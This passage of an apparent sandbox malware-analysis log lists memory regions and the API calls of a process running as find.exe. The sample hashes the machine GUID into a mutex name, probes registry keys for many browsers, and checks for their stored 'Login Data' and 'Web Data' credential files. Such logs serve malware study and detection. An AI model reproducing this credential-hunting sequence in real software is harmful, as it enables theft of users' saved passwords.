0x8010000 end_va = 0x804ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008010000" filename = "" Region: id = 626 start_va = 0x8050000 end_va = 0x808ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008050000" filename = "" Region: id = 627 start_va = 0x8090000 end_va = 0x80cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008090000" filename = "" Region: id = 628 start_va = 0x80d0000 end_va = 0x810ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080d0000" filename = "" Region: id = 629 start_va = 0x8110000 end_va = 0x814ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008110000" filename = "" Region: id = 630 start_va = 0x8150000 end_va = 0x818ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008150000" filename = "" Region: id = 631 start_va = 0x8190000 end_va = 0x81cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008190000" filename = "" Region: id = 632 start_va = 0x81d0000 end_va = 0x820ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000081d0000" filename = "" Region: id = 633 start_va = 0x8210000 end_va = 0x824ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008210000" filename = "" Region: id = 634 start_va = 0x8250000 end_va = 0x828ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008250000" filename = "" Region: id = 635 start_va = 0x8290000 end_va = 0x82cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008290000" filename = "" Region: id = 636 start_va = 0x82d0000 end_va = 0x830ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000082d0000" filename = "" Region: id = 637 start_va = 0x8310000 end_va = 0x834ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008310000" filename = "" Region: id = 638 start_va = 0x8350000 end_va = 0x838ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008350000" filename = "" Region: id = 639 start_va = 0x8390000 end_va = 0x83cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008390000" filename = "" Region: id = 640 start_va = 0x83d0000 end_va = 0x840ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000083d0000" filename = "" Region: id = 641 start_va = 0x8410000 end_va = 0x844ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008410000" filename = "" Region: id = 642 start_va = 0x8450000 end_va = 0x848ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008450000" filename = "" Region: id = 643 start_va = 0x8490000 end_va = 0x84cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008490000" filename = "" Region: id = 644 start_va = 0x84d0000 end_va = 0x850ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084d0000" filename = "" Region: id = 645 start_va = 0x8510000 end_va = 0x854ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008510000" filename = "" Region: id = 646 start_va = 0x8550000 end_va = 0x858ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008550000" filename = "" Region: id = 647 start_va = 0x8590000 end_va = 0x85cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008590000" filename = "" Region: id = 648 start_va = 0x85d0000 end_va = 0x860ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085d0000" filename = "" Region: id = 649 start_va = 0x8610000 end_va = 0x864ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008610000" filename = "" Region: id = 650 start_va = 0x8650000 end_va = 0x868ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008650000" filename = "" Region: id = 651 start_va = 0x8690000 end_va = 0x86cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 652 start_va = 0x86d0000 end_va = 0x870ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086d0000" filename = "" Region: id = 653 start_va = 0x8710000 end_va = 0x874ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008710000" filename = "" Region: id = 654 start_va = 0x8750000 end_va = 0x878ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008750000" filename = "" Region: id = 655 start_va = 0x8790000 end_va = 0x87cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008790000" filename = "" Region: id = 656 start_va = 0x87d0000 end_va = 0x880ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 657 start_va = 0x8810000 end_va = 0x884ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008810000" filename = "" Region: id = 658 start_va = 0x8850000 end_va = 0x888ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008850000" filename = "" Region: id = 659 start_va = 0x8890000 end_va = 0x88cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008890000" filename = "" Region: id = 660 start_va = 0x88d0000 end_va = 0x890ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088d0000" filename = "" Region: id = 661 start_va = 0x8910000 end_va = 0x894ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008910000" filename = "" Region: id = 662 start_va = 0x8950000 end_va = 0x898ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008950000" filename = "" Region: id = 663 start_va = 0x8990000 end_va = 0x89cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 664 start_va = 0x89d0000 end_va = 0x8a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089d0000" filename = "" Region: id = 665 start_va = 0x4b0000 end_va = 0x4b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 666 start_va = 0x8a10000 end_va = 0x8a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a10000" filename = "" Region: id = 667 start_va = 0x8a50000 end_va = 0x8a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a50000" filename = "" Region: id = 668 start_va = 0x8a90000 end_va = 0x8acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a90000" filename = "" Region: id = 669 start_va = 0x8ad0000 end_va = 0x8b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ad0000" filename = "" Region: id = 670 start_va = 0x8b10000 end_va = 0x8b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b10000" filename = "" Region: id = 671 start_va = 0x8b50000 end_va = 0x8b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b50000" filename = "" Region: id = 672 start_va = 0x8b90000 end_va = 0x8bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b90000" filename = "" Region: id = 673 start_va = 0x8bd0000 end_va = 0x8c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008bd0000" filename = "" Region: id = 674 start_va = 0x8c10000 end_va = 0x8c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c10000" filename = "" Region: id = 675 start_va = 0x8c50000 end_va = 0x8c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c50000" filename = "" Region: id = 676 start_va = 0x8c90000 end_va = 0x8ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c90000" filename = "" Region: id = 677 start_va = 0x8cd0000 end_va = 0x8d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cd0000" filename = "" Region: id = 678 start_va = 0x8d10000 end_va = 0x8d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d10000" filename = "" Region: id = 679 start_va = 0x8d50000 end_va = 0x8d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d50000" filename = "" Region: id = 680 start_va = 0x8d90000 end_va = 0x8dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d90000" filename = "" Region: id = 681 start_va = 0x8dd0000 end_va = 0x8e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008dd0000" filename = "" Region: id = 682 start_va = 0x8e10000 end_va = 0x8e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e10000" filename = "" Region: id = 683 start_va = 0x8e50000 end_va = 0x8e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e50000" filename = "" Region: id = 684 start_va = 0x8e90000 end_va = 0x8ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e90000" filename = "" Region: id = 685 start_va = 0x8ed0000 end_va = 0x8f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ed0000" filename = "" Region: id = 686 start_va = 0x8f10000 end_va = 0x8f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f10000" filename = "" Region: id = 687 start_va = 0x8f50000 end_va = 0x8f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f50000" filename = "" Region: id = 688 start_va = 0x8f90000 end_va = 0x8fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008f90000" filename = "" Region: id = 689 start_va = 0x8fd0000 end_va = 0x900ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008fd0000" filename = "" Region: id = 690 start_va = 0x9010000 end_va = 0x904ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009010000" filename = "" Region: id = 691 start_va = 0x9050000 end_va = 0x908ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009050000" filename = "" Region: id = 692 start_va = 0x9090000 end_va = 0x90cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009090000" filename = "" Region: id = 693 start_va = 0x90d0000 end_va = 0x910ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090d0000" filename = "" Region: id = 694 start_va = 0x9110000 end_va = 0x914ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009110000" filename = "" Region: id = 695 start_va = 0x9150000 end_va = 0x918ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009150000" filename = "" Region: id = 696 start_va = 0x9190000 end_va = 0x91cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009190000" filename = "" Region: id = 697 start_va = 0x91d0000 end_va = 0x920ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000091d0000" filename = "" Region: id = 698 start_va = 0x9210000 end_va = 0x924ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009210000" filename = "" Region: id = 699 start_va = 0x9250000 end_va = 0x928ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009250000" filename = "" Region: id = 700 start_va = 0x9290000 end_va = 0x92cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009290000" filename = "" Region: id = 701 start_va = 0x92d0000 end_va = 0x930ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092d0000" filename = "" Region: id = 702 start_va = 0x9310000 end_va = 0x934ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009310000" filename = "" Region: id = 703 start_va = 0x9350000 end_va = 0x938ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009350000" filename = "" Region: id = 704 start_va = 0x9390000 end_va = 0x93cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009390000" filename = "" Region: id = 705 start_va = 0x93d0000 end_va = 0x940ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000093d0000" filename = "" Region: id = 706 start_va = 0x9410000 end_va = 0x944ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009410000" filename = "" Region: id = 707 start_va = 0x9450000 end_va = 0x948ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009450000" filename = "" Region: id = 708 start_va = 0x9490000 end_va = 0x94cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009490000" filename = "" Region: id = 709 start_va = 0x94d0000 end_va = 0x950ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000094d0000" filename = "" Region: id = 710 start_va = 0x9510000 end_va = 0x954ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009510000" filename = "" Region: id = 711 start_va = 0x9550000 end_va = 0x958ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009550000" filename = "" Thread: id = 6 os_tid = 0xb1c [0110.926] GetCommandLineW () returned="\"C:\\Windows\\SysWOW64\\find.exe\"" [0110.927] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0110.990] CommandLineToArgvW (in: lpCmdLine="\"C:\\Windows\\SysWOW64\\find.exe\"", pNumArgs=0xdff7c | out: pNumArgs=0xdff7c) returned 0x5bc4a0*="C:\\Windows\\SysWOW64\\find.exe" [0111.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.041] StrStrW (lpFirst="C:\\Windows\\SysWOW64\\find.exe", lpSrch="-u") returned 0x0 [0111.042] SetErrorMode (uMode=0x3) returned 0x0 [0111.043] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x76680000 [0111.043] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x73f30000 [0111.044] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x74dc0000 [0111.069] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xdfd7c | out: lpWSAData=0xdfd7c) returned 0 [0111.081] GetProcessHeap () returned 0x5b0000 [0111.081] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c4640 [0111.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.087] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0xdfedc | out: phkResult=0xdfedc*=0x17c) returned 0x0 [0111.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.088] RegQueryValueExA (in: hKey=0x17c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x5c4640, lpcbData=0xdfed8*=0x208 | out: lpType=0x0, lpData=0x5c4640*=0x30, lpcbData=0xdfed8*=0x25) returned 0x0 [0111.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.090] RegCloseKey (hKey=0x17c) returned 0x0 [0111.090] GetProcessHeap () returned 0x5b0000 [0111.090] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5bc278 [0111.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.091] CryptAcquireContextW (in: phProv=0xdfebc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xdfebc*=0x5b63d8) returned 1 [0111.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.498] CryptCreateHash (in: hProv=0x5b63d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xdfec0 | out: phHash=0xdfec0) returned 1 [0111.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.499] CryptHashData (hHash=0x5be388, pbData=0x5c4640, dwDataLen=0x24, dwFlags=0x0) returned 1 [0111.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.500] CryptGetHashParam (in: hHash=0x5be388, dwParam=0x2, pbData=0x5bc278, pdwDataLen=0xdfeb8, dwFlags=0x0 | out: pbData=0x5bc278, pdwDataLen=0xdfeb8) returned 1 [0111.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.501] CryptDestroyHash (hHash=0x5be388) returned 1 [0111.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0111.502] CryptReleaseContext (hProv=0x5b63d8, dwFlags=0x0) returned 1 [0111.502] GetProcessHeap () returned 0x5b0000 [0111.502] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x31) returned 0x5be008 [0111.502] GetProcessHeap () returned 0x5b0000 [0111.502] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc278 | out: hHeap=0x5b0000) returned 1 [0111.503] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5be008, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0111.503] GetProcessHeap () returned 0x5b0000 [0111.503] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x42) returned 0x5b6648 [0111.503] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5be008, cbMultiByte=-1, lpWideCharStr=0x5b6648, cchWideChar=33 | out: lpWideCharStr="B7274519EDDE9BDC8AE51348A4AEC640") returned 33 [0111.503] GetProcessHeap () returned 0x5b0000 [0111.503] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x64) returned 0x5b7e20 [0111.503] GetProcessHeap () returned 0x5b0000 [0111.504] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b6648 | out: hHeap=0x5b0000) returned 1 [0111.504] GetProcessHeap () returned 0x5b0000 [0111.504] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5be008 | out: hHeap=0x5b0000) returned 1 [0111.504] GetProcessHeap () returned 0x5b0000 [0111.504] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c4640 | out: hHeap=0x5b0000) returned 1 [0111.505] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="B7274519EDDE9BDC8AE51348") returned 0x184 [0111.505] GetLastError () returned 0x0 [0111.505] GetProcessHeap () returned 0x5b0000 [0111.505] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1388) returned 0x5c4fd0 [0111.505] GetProcessHeap () returned 0x5b0000 [0111.506] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc0e0 [0111.517] GetProcessHeap () returned 0x5b0000 [0111.517] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5c6360 [0111.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.518] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5c6360, pcbData=0xdfb98*=0x104 | out: pdwType=0x0, pvData=0x5c6360, pcbData=0xdfb98*=0x104) returned 0x2 [0111.519] GetProcessHeap () returned 0x5b0000 [0111.519] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6360 | out: hHeap=0x5b0000) returned 1 [0111.519] GetProcessHeap () returned 0x5b0000 [0111.519] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5c6360 [0111.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.520] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\ComodoGroup\\IceDragon\\Setup", pszValue="SetupPath", pdwType=0x0, pvData=0x5c6360, pcbData=0xdfba8*=0x104 | out: pdwType=0x0, pvData=0x5c6360, pcbData=0xdfba8*=0x104) returned 0x2 [0111.520] GetProcessHeap () returned 0x5b0000 [0111.521] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6360 | out: hHeap=0x5b0000) returned 1 [0111.532] GetProcessHeap () returned 0x5b0000 [0111.532] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5c6360 [0111.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.533] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Apple Computer, Inc.\\Safari", pszValue="InstallDir", pdwType=0x0, pvData=0x5c6360, pcbData=0xdfb9c*=0x104 | out: pdwType=0x0, pvData=0x5c6360, pcbData=0xdfb9c*=0x104) returned 0x2 [0111.533] GetProcessHeap () returned 0x5b0000 [0111.534] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6360 | out: hHeap=0x5b0000) returned 1 [0111.534] GetProcessHeap () returned 0x5b0000 [0111.534] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5c6360 [0111.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.535] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\K-Meleon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5c6360, pcbData=0xdfba4*=0x104 | out: pdwType=0x0, pvData=0x5c6360, pcbData=0xdfba4*=0x104) returned 0x2 [0111.535] GetProcessHeap () returned 0x5b0000 [0111.535] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6360 | out: hHeap=0x5b0000) returned 1 [0111.535] GetProcessHeap () returned 0x5b0000 [0111.535] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5c6360 [0111.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.536] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\mozilla.org\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5c6360, pcbData=0xdfb8c*=0x104 | out: pdwType=0x0, pvData=0x5c6360, pcbData=0xdfb8c*=0x104) returned 0x2 [0111.536] GetProcessHeap () returned 0x5b0000 [0111.536] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6360 | out: hHeap=0x5b0000) returned 1 [0111.536] GetProcessHeap () returned 0x5b0000 [0111.536] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5c6360 [0111.537] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.537] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5c6360, pcbData=0xdfb8c*=0x104 | out: pdwType=0x0, pvData=0x5c6360, pcbData=0xdfb8c*=0x104) returned 0x2 [0111.537] GetProcessHeap () returned 0x5b0000 [0111.538] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6360 | out: hHeap=0x5b0000) returned 1 [0111.538] GetProcessHeap () returned 0x5b0000 [0111.538] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5c6360 [0111.538] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.538] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Flock", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5c6360, pcbData=0xdfba4*=0x104 | out: pdwType=0x0, pvData=0x5c6360, pcbData=0xdfba4*=0x104) returned 0x2 [0111.538] GetProcessHeap () returned 0x5b0000 [0111.539] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6360 | out: hHeap=0x5b0000) returned 1 [0111.539] GetProcessHeap () returned 0x5b0000 [0111.539] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c4640 [0111.539] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0111.540] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c4640 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0111.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.545] StrStrW (lpFirst="C:\\Program Files (x86)", lpSrch="(x86)") returned="(x86)" [0111.546] GetProcessHeap () returned 0x5b0000 [0111.546] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c7ca0 [0111.546] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x5c7ca0, nSize=0x104 | out: lpDst="C:\\Program Files") returned 0x11 [0111.546] GetProcessHeap () returned 0x5b0000 [0111.546] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6a) returned 0x5c7eb0 [0111.547] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.548] wvsprintfW (in: param_1=0x5c7eb0, param_2="%s\\NETGATE\\Black Hawk", arglist=0xdfbb4 | out: param_1="C:\\Program Files\\NETGATE\\Black Hawk") returned 35 [0111.548] GetProcessHeap () returned 0x5b0000 [0111.548] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4a) returned 0x5cbe28 [0111.548] GetProcessHeap () returned 0x5b0000 [0111.548] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7eb0 | out: hHeap=0x5b0000) returned 1 [0111.549] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.549] PathFileExistsW (pszPath="C:\\Program Files\\NETGATE\\Black Hawk") returned 0 [0111.549] GetProcessHeap () returned 0x5b0000 [0111.550] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbe28 | out: hHeap=0x5b0000) returned 1 [0111.550] GetProcessHeap () returned 0x5b0000 [0111.550] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7ca0 | out: hHeap=0x5b0000) returned 1 [0111.550] GetProcessHeap () returned 0x5b0000 [0111.550] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3fcc) returned 0x5c7ca0 [0111.551] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.552] wvsprintfW (in: param_1=0x5c7ca0, param_2="%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}", arglist=0xdfbbc | out: param_1="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 90 [0111.552] GetProcessHeap () returned 0x5b0000 [0111.552] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb8) returned 0x5cbc78 [0111.552] GetProcessHeap () returned 0x5b0000 [0111.553] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7ca0 | out: hHeap=0x5b0000) returned 1 [0111.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.553] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 0 [0111.554] GetProcessHeap () returned 0x5b0000 [0111.554] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbc78 | out: hHeap=0x5b0000) returned 1 [0111.568] GetProcessHeap () returned 0x5b0000 [0111.568] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c7ca0 [0111.569] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0111.569] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5c7ca0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0111.571] GetProcessHeap () returned 0x5b0000 [0111.571] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f08 [0111.572] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.572] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 78 [0111.572] GetProcessHeap () returned 0x5b0000 [0111.572] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa0) returned 0x5bac20 [0111.572] GetProcessHeap () returned 0x5b0000 [0111.573] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.574] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0111.574] GetProcessHeap () returned 0x5b0000 [0111.574] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bac20 | out: hHeap=0x5b0000) returned 1 [0111.574] GetProcessHeap () returned 0x5b0000 [0111.575] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f08 [0111.575] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.576] wvsprintfW (in: param_1=0x5c7f08, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 76 [0111.576] GetProcessHeap () returned 0x5b0000 [0111.576] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9c) returned 0x5bb0b8 [0111.576] GetProcessHeap () returned 0x5b0000 [0111.576] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f08 | out: hHeap=0x5b0000) returned 1 [0111.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.577] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User 